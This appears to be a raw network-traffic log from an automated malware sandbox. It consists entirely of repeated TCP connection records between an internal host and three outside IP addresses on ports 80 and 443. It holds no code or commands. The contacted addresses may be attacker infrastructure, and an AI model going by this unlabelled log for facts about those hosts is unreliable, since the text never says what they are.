                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 95.217.202.210:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
